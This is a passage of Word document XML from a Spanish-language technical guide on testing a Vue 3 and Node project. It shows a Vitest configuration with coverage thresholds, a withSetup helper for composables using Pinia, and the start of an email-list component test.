        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      exclude</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'node_modules/'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/**/*.d.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/**/types.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/main.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/router.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'coverage/**'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resolve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    alias</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SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/vitest.config.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { defineConfig } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vitest/config'</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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    globals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environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'node'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'forks'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Requerido para Testcontainers &lt;sup&gt;[301]&lt;/sup&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/**/*.test.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src/**/*.spec.ts'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    coverage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'v8'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      reporter</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'json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'json-summary'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'html'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      reportsDirectory</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./coverage'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      thresholds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        lines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        branches</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statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">85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setupFiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./test/setup.ts'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Start w:id="201" w:name="Xf97a31cf85c6200216564107bbe777103db642a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1.1 Frontend: mount() y withSetup para Composables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los componentes Vue 3 que usan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script setup&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y la Composition API se testean mediante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@vue/test-utils</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y su función</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mount()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Para composables que dependen de hooks del ciclo de vida como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onMounted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onBeforeMount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se requiere un helper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">withSetup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que los ejecute dentro de un contexto de componente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[298]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[296]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/test/utils.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createApp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nextTick } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'vue'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createPinia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setActivePinia } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'pinia'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Helper para testear composables que usan hooks de ciclo de vida.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Crea una app Vue temporal, monta el composable y retorna el resultado</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * junto con la instancia de app para limpieza.</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withSetup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(hook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> () </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> T)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ReturnType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> createApp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Operator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result</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createApp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">setup</w:t>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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hook</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setActivePinia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createPinia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</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app]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de test para un componente de lista de emails:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/src/components/__tests__/VirtualEmailList.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> beforeEach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 mount } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'@vue/test-utils'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { createPinia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> setActivePinia } </w:t>
      </w:r>
      <w:r>
